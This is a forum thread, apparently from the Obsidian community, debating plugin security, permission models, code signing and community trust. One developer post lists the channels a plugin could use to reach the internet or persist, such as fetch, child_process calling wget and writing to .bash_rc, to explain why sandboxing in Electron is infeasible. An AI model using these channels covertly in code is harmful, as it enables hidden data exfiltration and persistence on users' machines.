Security of the plugins

As a suggestion, permissions may be a good way to handle this (akin to how gsuite extensions work). A plugin can request read/write access and the user has to accept the permissions model. Also internet access is probably something to request permissions from the user.

On the other hand, pretty much every open source tool with considerably more danger (bash shells, python, etc.) have this problem and no one cares. The user is responsible for what they feel is a trustworthy program/plugin. The simple answer is probably just to require that plugins are open sourced.

Users should be able to choose closed source plugins if they want. It’s their data, their files, their computers, they should be able to make their own choices about acceptable risks.

10 Likes

The problem is really this.
Within Electron, implementing (and enforcing) a permission model is either flat out impossible (no matter the resources you have) or, if possible, extremely challenging (more than building obsidian itself).

There is no way in electron to “containerize” the plugin code execution and allow communication only through some specific APIs. Once a code runs, it runs with access to everything like the main obsidian code.

This issue should be managed at the electron level. However, I would not be surprised to hear the answer from the electron devs: “We never intend to have segregated code execution in electron.”

3 Likes

Please refer to my technical analysis from earlier on why this is impossible and only provides an illusion of security: Security of the plugins - #3 by Licat

2 Likes

This is not possible?!


Please focus on suggestion of Trivial “social” security more.

1 Like

It is not possible because there are many many many ways a plugin could connect to the internet:

  • By using the NodeJS http/https module
  • By using XMLHttpRequest browser API
  • By using the browser’s “fetch” API
  • By inserting an <image>, <audio>, <video>, and many other HTML elements containing a src property which will make the engine fetch a URL as if it’s some kind of resource
  • By inserting an <iframe>, opening a new BrowserWindow, etc, which can open any page on the internet
  • By adding a CSS property for background-image, font-family, etc which will fetch those resources at any URL.
  • By executing another executable on your computer using the child_process NodeJS module, such as wget.
  • By storing a script in an auto-run location such as .bash_rc, using the fs NodeJS module.
  • And many many more. Possibly hundreds of other methods that we are not even aware of.

This is a huge attack surface, while we can plug those holes one-by-one and cripple the ability of plugins to do useful work, you can’t take into account the unknown ways a malicious player will be able to exploit.

10 Likes

For sure, a great list. I think you’ll see most of these in due time!

5 Likes

Thanks for analysis!

  • The biggest and most easy to close security holes should be closed
  • “Less critical” ways should be monitored by Obsidian (here I think is easy to monitor what potentially dangerous classes the plugin is executing)
  • It will be nice to find some smart way (fully automated) to utilize this output of this “classes / function monitoring”) and present this simple 1,2,3 text showing what the plugin can potentially do (based on classes / functions used)

  • When Plugin is using “potenionally” insecure classes / functions (you list them above) the plugin can be installed only when user will explicitly grant the access and he is aware of the risks (this should be managed by “plugin market” installation process of plugin
  • By restricting some ways you have mentioned above you will have more “control” as side effect. Since the way how plugins will be written, the classes they will use will be more uniformed, as there will be not many ways to archive what the developer of the plugin want.
  • The list of good practices when writing of plugin should be created by devs

Believe me the plugin market will be huge - in future with paid plugins. The plugins will be one of the main strength of the Obsidian, as it can enhance the functionality of Obsidian exponentially…

  • without hight quality plugins
  • ensuring best practices when writing them
  • and some restrictions and in-build security aspects in API some plugin

Can really shade bad image of Obsidian…you know the internet and average user…

Don’t neglect the Plugins it can turn to one of your sources of funding…
Just look at Apple store, Google play store… this is gold mine for Apple and Google now

3 Likes

Thanks for the suggestion. We’ll try our best to keep everyone safe!

10 Likes

Here are some important take aways for me:

  1. Using Obsidian is optional
  2. Obsidian is currently free. Rewarding the developers is optional
  3. Installing plugins is optional

I want to say that I’m in awe @Licat and @Silver at the quality of what you are creating and the pace of your development. I get that you are trying to create a safe and awesome project. I’m grateful and I’m using Obsidian all day long, every day!

46 Likes

Totally agree. I was just throwing out a suggestion, but honestly i think it’s not worth the effort at this point. You’ll be pluging a bunch of holes “hoping” to guarentee security, but as any security professional knows, having an informed the user is the best defence.

The more scalable solution is to have a community-inspectable repository for non-official plugins. Open-source will make it easier to inspect for security holes. In the future, maybe a paid model will work but it’s way too much work to do that now.

I took a cursory look at the electron security guidance and it seems like there are basic controls for protecting the main application but nothing about plugins. (Not sure i fully understand it though.) I’m a c++, data, ml, devops person lol

If I understand the issue correctly, it would very misleading to provide such information, because it’s impossible to properly detect all the cases when the plugin has access to something.

And if you try to detect just some cases, this will lure users in the false sense of security: “oh, it says it can access only these, I’m fine”. We can argue about it, but I would prefer the application to honestly say “sorry, we have no idea what that plugin can do”, than try to guess and fail.

On the other hand, pure social features like comments and ratings are good suggestions that would help a lot (though, even they are not without possible hacks).

7 Likes

@ryanjamurphy I think you’re exactly right. The social aspect of it along with the fact that plugin source code (since I believe it is not compiled) to be always “readable” by the community members that do understand the code will probably allow the community to sniff things out.

I think its a good rule of thumb for non-coders like me to not install any plugin unless you see some kind of endorsement (aka a 10+ like count) from forum members amongst whom someone is bound to understand the code

3 Likes

Curious, has the community come to a consensus on 3rd-party plugins concerning security?

1 Like

Question of trust, I guess.

1 Like

How do you mean? Many plugins have been developed and can be inspected on the community plugin gallery in-app or on Github. Some have 20k+ installs.

Was just curious, as all the above discussions kinda just ended. So I just presumed it was “self code audit”. I personally don’t know any of the programming langs used with obsidian, therefor inspecting the plug-in code doesn’t work for me. :expressionless:

Just my two-cents on what might be the best balance:

Something simple as using gpg pki might be the “best bang for the buck” concerning the security and effort. Granted I wouldn’t really start this journey until a 1.0 release is closer to being scheduled. Maybe something like the following could work if the devs choose to go down that path.

  • Devs create a gpg key pair.
  • Plugin authors request a code audit of their plugin “Devs may require a fee for this.” There could be a path for providing a binary plugin, but that would require more effort and more money.
  • Once the plugin is vetted, a digest and gpg signature is created. The plugin is packaged “just an example” in that “asar” format and hosted on the devs plugin delivery system." Therefor we have a cryptographically authenticated “trust” plugin.
  • The Obsidian comes with the public key that can check signature of the digest to ensure that the plugin has not been modified. Possibly doing random checks through out.
  • Provide an option in the community plugins section to allow “vetted” 3rd-party plugins. (Maybe the mobile version of obsidian can provide an option for using the vetted plugins.)

(Honestly, the best option is to keep safe mode on, and have the devs cook in the features natively. Just keep with current “turn off safe-mode” option of prompting the user with a legal narrative about not holding the devs liable for any mishaps unintended or not)

1 Like

I understand what you are proposing but I think you are missing the point here.

Here are the major points:

  1. The plugins can execute any code and are not just limited to Obsidian’s API. Plugins are more side-loaded applications. This is an electron limitation where there is no mechanism to contenarize some part of the code. (VScode has the same issue)
  2. We do not have time to look at the source code of every plugin
  3. Even if we looked at the code, there are a million+1 ways to obfuscate and sneek-in maliciuous code.
  4. Even if we looked at the code once, the plugin author can insert malicious code in a following update.

This is not a techical problem on how to sign plugins. And we don’t want to certify anything because this will give some users a sense of security that we know is not warranted.

We currently have in place one simple safeguard mechanism: if a plugin is known to cause problems, we can remotely disable it.

9 Likes

I do not disagree at all and understand that it all boils down to “effort and time.” I believe the (clickwrap agreement) is the best “at the moment” option.

I also think that while the number of installs and developer’s reputation and involvement in the community are important to gauge things, it should be understood that many people who are doing these installs have their computers locked down pretty well.

So for an average user who does not consider the implications of what could potentially happen, some of this sense of trust and consistency could be misleading.

I think it is cool that the developers and moderators are so upfront about this. It has really made me question my computer security practices, and that is always a good thing.

3 Likes